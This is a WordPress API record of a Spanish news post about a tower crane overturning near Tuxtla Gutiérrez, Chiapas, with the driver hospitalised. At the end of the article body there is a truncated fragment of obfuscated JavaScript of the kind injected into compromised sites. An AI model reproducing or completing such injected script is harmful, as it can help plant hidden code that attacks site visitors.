{"id":14408,"date":"2024-02-28T03:53:40","date_gmt":"2024-02-28T03:53:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14408"},"modified":"2024-02-28T03:53:41","modified_gmt":"2024-02-28T03:53:41","slug":"vuelca-una-grua-de-torre-en-el-tramo-tuxtla-san-fernando","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14408","title":{"rendered":"Vuelca una gr\u00faa de torre en el tramo Tuxtla-San Fernando"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"686\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1709092124241-1024x686.jpg\" alt=\"\" class=\"wp-image-14409\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1709092124241-1024x686.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1709092124241-300x201.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1709092124241-768x515.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1709092124241-110x75.jpg 110w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1709092124241.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 27 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Una gr\u00faa de gran tama\u00f1o conocida como &#8220;Torre&#8221;, termin\u00f3 volcando este martes por la tarde en el tramo Tuxtla-San Fernando, dejando cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, la pesada unidad que es empleada en maniobras de carga y descarga en exteriores circulaba de Poniente a Oriente y 200 metros antes de llegar al arco de revisi\u00f3n el conductor perdi\u00f3 el control, choc\u00f3 contra un mont\u00f3n de tierra y piedras, cay\u00f3 en la cuneta y luego se volc\u00f3 arrastr\u00e1ndose unos 20 metros.<\/p>\n\n\n\n<p>En este trayecto se desprendi\u00f3 de varias partes de la carrocer\u00eda y los ejes as\u00ed como partes del brazo de la gr\u00faa.<\/p>\n\n\n\n<p>El chofer fue rescatado por elementos de la polic\u00eda y elementos de Protecci\u00f3n Civil y fue llevado con vida a un hospital para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Debido a la magnitud del accidente el tr\u00e1nsito se vio afectado por dos horas.<\/p>\n\n\n\n<p>Finalmente, una gr\u00faa remolc\u00f3 los fierros a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 27 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Una gr\u00faa de gran tama\u00f1o conocida como &#8220;Torre&#8221;, termin\u00f3 volcando este martes por la tarde en el tramo Tuxtla-San Fernando, dejando cuantiosos da\u00f1os materiales. Los reportes oficiales informaron que, la pesada unidad que es empleada en maniobras de carga y descarga en exteriores &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14409,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14408","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14408","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14408"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14408\/revisions"}],"predecessor-version":[{"id":14410,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14408\/revisions\/14410"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14409"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14408"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14408"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14408"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}